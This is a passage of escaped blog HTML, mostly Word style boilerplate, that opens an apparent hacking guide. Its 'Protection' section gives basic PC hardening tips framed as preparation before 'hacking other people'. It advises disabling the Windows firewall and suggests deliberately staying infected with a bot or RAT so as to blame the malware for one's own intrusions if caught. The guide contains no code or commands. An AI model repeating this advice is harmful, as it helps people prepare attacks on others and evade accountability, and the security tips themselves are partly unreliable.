   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; UnhideWhenUsed=&quot;false&quot; Name=&quot;Revision&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;34&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;List Paragraph&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;29&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Quote&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;30&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Intense Quote&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;19&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Subtle Emphasis&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;21&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Intense Emphasis&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;31&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Subtle Reference&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;32&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Intense Reference&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;33&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Book Title&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;37&quot; Name=&quot;Bibliography&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; QFormat=&quot;true&quot; Name=&quot;TOC Heading&quot;/&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Table Normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-priority:99;
 mso-style-qformat:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0in 5.4pt 0in 5.4pt;
 mso-para-margin-top:auto;
 mso-para-margin-right:0in;
 mso-para-margin-bottom:auto;
 mso-para-margin-left:0in;
 mso-pagination:widow-orphan;
 font-size:11.0pt;
 font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;
 mso-ascii-font-family:Calibri;
 mso-ascii-theme-font:minor-latin;
 mso-fareast-font-family:&quot;Times New Roman&quot;;
 mso-fareast-theme-font:minor-fareast;
 mso-hansi-font-family:Calibri;
 mso-hansi-theme-font:minor-latin;
 mso-bidi-font-family:&quot;Times New Roman&quot;;
 mso-bidi-theme-font:minor-bidi;}
&lt;/style&gt; &lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;o:shapedefaults v:ext=&quot;edit&quot; spidmax=&quot;1026&quot;/&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;o:shapelayout v:ext=&quot;edit&quot;&gt;   &lt;o:idmap v:ext=&quot;edit&quot; data=&quot;1&quot;/&gt;  &lt;/o:shapelayout&gt;&lt;/xml&gt;&lt;![endif]--&gt;  &lt;br /&gt;
&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;i- Protection&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;ii- Encryption&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;iii- Anonymity&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;iv- Links&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;Protection&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&amp;nbsp;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt; &lt;/span&gt;Basically what I am trying to say in this section is, before you go out hacking other people and other things, just check for a second and make sure it&#39;s not as easy to hack your device. There are some pretty simple steps for this though.&lt;/span&gt;&lt;/div&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&lt;/span&gt;Make sure all your security updates are installed, if you have windows firewall disable it.&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;MsoNormalCxSpMiddle&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;Download your own firewall. If you are behind a router you can skip this.&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;Make sure all unused ports are closed.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&lt;/span&gt;Check your msconfig, run a few HJT logs and Malwarebyte&#39;s to make sure you are not already infected.&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;;&quot;&gt;&lt;span&gt;&lt;/span&gt;Use a keyscambler to prevent keyloggers&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;It is important that you are not infected because other could see you hacking and steal it from you or alternitively, if they get caught, you get caught. On the other hand you might want to stay infected by a bot or RAT so if and when you are caught you can claim you had know knowledge and the bot controlled your PC and performed the hackl without your knowledge. However I am not someone who intends to be caught. (I&#39;m not really a black hat either)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
